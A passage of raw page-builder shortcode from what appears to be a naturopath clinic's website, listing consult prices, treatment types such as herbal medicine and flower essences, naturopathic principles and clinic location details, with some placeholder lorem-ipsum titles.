icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" icon_color__hover_enabled=\"on|hover\" icon_color__hover=\"#000000\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Vestibulum ante\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Nulla quis\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Sed porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Curabitur nulla\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\" sticky_enabled=\"0\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Quisque velit\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Proin eget\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Nulla porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" column_structure=\"1_3,1_3,1_3\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][/et_pb_column][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][/et_pb_column][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"4_4\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Initial consult (90 min) - $120\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.jpg\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" title_text=\"Icon\" sticky_enabled=\"0\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Return consult (50 min) - $80\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.jpg\" _builder_version=\"4.9.4\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" title_text=\"5-01\" sticky_enabled=\"0\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][et_pb_blurb image_last_edited=\"off|tablet\" _builder_version=\"4.9.4\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_blurb][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\" custom_padding=\"||0px|||\" sticky_enabled=\"0\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_5\"][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-7.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-1.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-4.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]<ul>\n<li>Stress strategies</li>\n<li>Exercise and movement</li>\n<li>Mindfulness </li>\n<li>Sleep support</li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-5.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<ul>\n<li>Flower <span style=\"font-family: Montserrat;\">essences</span> </li>\n</ul>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.4.8\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">prevention</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\"></span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\"></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.4.8\" background_color=\"#f6ddd7\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-24.png\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\"][et_pb_image title_text=\"3-01\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\" src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.jpg\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_text=\"View Calendar\" button_alignment=\"center\" _builder_version=\"4.4.8\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Tues/Wed/Thurs: 9am - 